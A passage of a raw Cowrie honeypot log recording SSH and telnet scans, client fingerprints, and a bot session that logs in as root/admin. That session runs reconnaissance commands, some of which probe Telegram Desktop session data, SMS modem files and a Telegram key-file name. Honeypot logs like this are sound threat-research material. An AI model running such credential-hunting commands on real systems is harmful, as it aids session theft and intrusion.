{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34388,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7081117d064","protocol":"telnet","message":"New connection: 212.227.125.160:34388 (1.2.3.4:23) [session: d7081117d064]","sensor":"my-vps","timestamp":"2025-09-08T12:02:58.923550Z"}
{"eventid":"cowrie.session.closed","duration":13.41238808631897,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:03:12.335820Z","src_ip":"212.227.125.160","session":"d7081117d064"}
{"eventid":"cowrie.session.connect","src_ip":"121.40.84.227","src_port":35761,"dst_ip":"1.2.3.4","dst_port":22,"session":"5590cffe7db3","protocol":"ssh","message":"New connection: 121.40.84.227:35761 (1.2.3.4:22) [session: 5590cffe7db3]","sensor":"my-vps","timestamp":"2025-09-08T12:03:29.047655Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:03:29.048954Z","src_ip":"121.40.84.227","session":"5590cffe7db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40492,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f8af6d53576","protocol":"ssh","message":"New connection: 212.227.125.160:40492 (1.2.3.4:22) [session: 0f8af6d53576]","sensor":"my-vps","timestamp":"2025-09-08T12:04:31.517711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-09-08T12:04:31.518404Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-09-08T12:04:31.842784Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-08T12:04:33.345798Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:04:34.674961Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:35.352700Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T12:04:35.353428Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T12:04:35.353924Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:35.678745Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:36.421078Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-09-08T12:04:36.422006Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:36.750075Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:37.461245Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T12:04:37.462158Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:37.795603Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:38.462854Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-09-08T12:04:38.463603Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:38.793448Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:39.533651Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-08T12:04:39.534337Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:39.866161Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:40.534022Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-08T12:04:40.534798Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:40.860983Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:41.590048Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-09-08T12:04:41.590741Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:41.917389Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:42.650367Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-09-08T12:04:42.651089Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:43.007348Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:04:43.672784Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-09-08T12:04:43.673471Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:04:43.998722Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.closed","duration":"36.7","message":"Connection lost after 36.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:05:08.251653Z","src_ip":"212.227.125.160","session":"0f8af6d53576"}
{"eventid":"cowrie.session.connect","src_ip":"27.121.202.36","src_port":38572,"dst_ip":"1.2.3.4","dst_port":23,"session":"584fd1f76866","protocol":"telnet","message":"New connection: 27.121.202.36:38572 (1.2.3.4:23) [session: 584fd1f76866]","sensor":"my-vps","timestamp":"2025-09-08T12:05:20.387702Z"}
{"eventid":"cowrie.session.closed","duration":13.135247468948364,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:05:33.522874Z","src_ip":"27.121.202.36","session":"584fd1f76866"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53672,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d889c860ad2","protocol":"ssh","message":"New connection: 217.72.205.35:53672 (1.2.3.4:22) [session: 5d889c860ad2]","sensor":"my-vps","timestamp":"2025-09-08T12:07:15.985448Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:07:15.987241Z","src_ip":"217.72.205.35","session":"5d889c860ad2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54834,"dst_ip":"1.2.3.4","dst_port":23,"session":"3494ca326e93","protocol":"telnet","message":"New connection: 212.227.235.229:54834 (1.2.3.4:23) [session: 3494ca326e93]","sensor":"my-vps","timestamp":"2025-09-08T12:07:49.050207Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:07:49.259144Z","src_ip":"212.227.235.229","session":"3494ca326e93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:07:49.302884Z","src_ip":"212.227.235.229","session":"3494ca326e93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42496,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e8ab314d89d","protocol":"ssh","message":"New connection: 212.227.125.160:42496 (1.2.3.4:22) [session: 3e8ab314d89d]","sensor":"my-vps","timestamp":"2025-09-08T12:09:23.395776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:23.713506Z","src_ip":"212.227.125.160","session":"3e8ab314d89d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:09:23.714138Z","src_ip":"212.227.125.160","session":"3e8ab314d89d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:24.685041Z","src_ip":"212.227.125.160","session":"3e8ab314d89d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42504,"dst_ip":"1.2.3.4","dst_port":22,"session":"7645b08aafc2","protocol":"ssh","message":"New connection: 212.227.125.160:42504 (1.2.3.4:22) [session: 7645b08aafc2]","sensor":"my-vps","timestamp":"2025-09-08T12:09:24.864098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:25.151919Z","src_ip":"212.227.125.160","session":"7645b08aafc2"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:09:25.152788Z","src_ip":"212.227.125.160","session":"7645b08aafc2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:26.165228Z","src_ip":"212.227.125.160","session":"7645b08aafc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42530,"dst_ip":"1.2.3.4","dst_port":22,"session":"efd4f922a530","protocol":"ssh","message":"New connection: 212.227.125.160:42530 (1.2.3.4:22) [session: efd4f922a530]","sensor":"my-vps","timestamp":"2025-09-08T12:09:26.346052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:26.609285Z","src_ip":"212.227.125.160","session":"efd4f922a530"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:09:26.610075Z","src_ip":"212.227.125.160","session":"efd4f922a530"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:27.577873Z","src_ip":"212.227.125.160","session":"efd4f922a530"}
{"eventid":"cowrie.session.connect","src_ip":"8.221.136.6","src_port":29106,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3133e640802","protocol":"ssh","message":"New connection: 8.221.136.6:29106 (1.2.3.4:22) [session: f3133e640802]","sensor":"my-vps","timestamp":"2025-09-08T12:09:43.140649Z"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:46.391402Z","src_ip":"8.221.136.6","session":"f3133e640802"}
{"eventid":"cowrie.session.connect","src_ip":"8.221.136.6","src_port":29120,"dst_ip":"1.2.3.4","dst_port":22,"session":"83896c88c0da","protocol":"ssh","message":"New connection: 8.221.136.6:29120 (1.2.3.4:22) [session: 83896c88c0da]","sensor":"my-vps","timestamp":"2025-09-08T12:09:46.620780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:46.621466Z","src_ip":"8.221.136.6","session":"83896c88c0da"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-08T12:09:46.867837Z","src_ip":"8.221.136.6","session":"83896c88c0da"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:47.613010Z","src_ip":"8.221.136.6","session":"83896c88c0da"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":53316,"dst_ip":"1.2.3.4","dst_port":22,"session":"3acc67c2400e","protocol":"ssh","message":"New connection: 192.155.90.220:53316 (1.2.3.4:22) [session: 3acc67c2400e]","sensor":"my-vps","timestamp":"2025-09-08T12:09:57.872954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:58.040587Z","src_ip":"192.155.90.220","session":"3acc67c2400e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:09:58.041316Z","src_ip":"192.155.90.220","session":"3acc67c2400e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:58.638488Z","src_ip":"192.155.90.220","session":"3acc67c2400e"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":53332,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c555ccc70f2","protocol":"ssh","message":"New connection: 192.155.90.220:53332 (1.2.3.4:22) [session: 7c555ccc70f2]","sensor":"my-vps","timestamp":"2025-09-08T12:09:58.732467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:58.901296Z","src_ip":"192.155.90.220","session":"7c555ccc70f2"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 